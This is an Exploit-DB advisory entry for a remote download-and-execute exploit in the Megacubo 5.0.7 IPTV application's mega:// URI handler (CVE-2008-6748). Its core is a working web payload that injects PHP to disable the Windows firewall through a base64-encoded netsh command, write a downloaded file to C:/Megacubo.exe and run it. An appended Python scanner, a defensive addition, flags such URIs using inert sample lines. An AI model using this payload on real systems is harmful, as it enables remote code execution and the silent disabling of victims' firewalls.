Megacubo 5.0.7 mega:// Remote File Download and Execute Exploit

ID: EDB-ID:7630
Type: exploitdb
Reporter: JJunior
Modified: 2009-01-01T00:00:00


Megacubo 5.0.7 (mega://) Remote File Download and Execute Exploit. CVE-2008-6748. Remote exploit for the Windows platform.

Megacubo 5.0.7 download & execute
by: JJunior

Tested against Internet Explorer 7 and Mozilla Firefox 1.5 on Windows XP SP3.

software site:
download url:
"Megacubo is an IPTV tuner application written in PHP + Winbinder.
It has a catalogue of links of TV streams which are available
for free in the web. At the moment it only runs on Windows (2000,
XP and Vista)."

Example exploit (download & execute):

<title>MegaCubo - download & Execute</title>
<meta http-equiv="Content-Type" content="text/html; ">
// URL of the file to download and execute
evil = '';
// command that disables the firewall, base64-encoded
firewall = 'bmV0c2ggZmlyZXdhbGwgc2V0IG9wbW9kZSBtb2RlID0gZGlzYWJsZQ==';
shellcode = 'mega://play|con.."a()".system(base64_decode("'+firewall+'")).fputs(fopen("c:/Megacubo.exe","w"),file_get_contents("'+evil+'")).system("C:/Megacubo.exe")."/?");print(';
// shell code


# [2009-01-01]
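
A detection check built from the proof of concept above, as an added example that is not part of the original advisory: it scans HTML or proxy-log text for mega:// URIs that embed quotes or the PHP calls seen in the PoC. The function name, the sample lines and the premise that a legitimate link carries only a plain channel name are assumptions.

```python
import re
from urllib.parse import unquote

# PHP function names that appear in the proof of concept on this page.
PHP_CALLS = ("system", "base64_decode", "fopen", "fputs", "file_get_contents")
MEGA_URI = re.compile(r"mega://[^\s<>]*", re.IGNORECASE)
CALL = re.compile(r"\b(" + "|".join(PHP_CALLS) + r")\s*\(", re.IGNORECASE)


def suspicious_mega_uris(text):
    """Return [(uri, reasons)] for mega:// URIs that carry code-like content."""
    findings = []
    for match in MEGA_URI.finditer(text):
        # Decode percent-encoding first so %22 and %28 cannot hide quotes or calls.
        uri = unquote(match.group(0))
        reasons = []
        # A quote followed by more URI text means the value breaks out of a string;
        # a lone trailing quote is just the closing delimiter of an HTML attribute.
        if re.search(r"[\"'].", uri):
            reasons.append("quote")
        reasons += sorted({"call:" + name.lower() for name in CALL.findall(uri)})
        if reasons:
            findings.append((uri, reasons))
    return findings


# Constructed sample lines (not real traffic); payloads are inert placeholders.
SAMPLE = "\n".join([
    '<a href="mega://play|ExampleChannel">watch</a>',
    "GET /page?u=mega://play|x%22.system(base64_decode(%22UExBQ0VIT0xERVI=%22)).%22 HTTP/1.1",
    "link = 'mega://play|y\".fputs(fopen(\"PLACEHOLDER\",\"w\"),\"\").\"';",
])

if __name__ == "__main__":
    for uri, reasons in suspicious_mega_uris(SAMPLE):
        print(reasons, uri)
```

The same patterns can be applied at a web proxy or mail gateway; on a host, removing the mega:// protocol handler registration stops a browser from passing such URIs to the application at all.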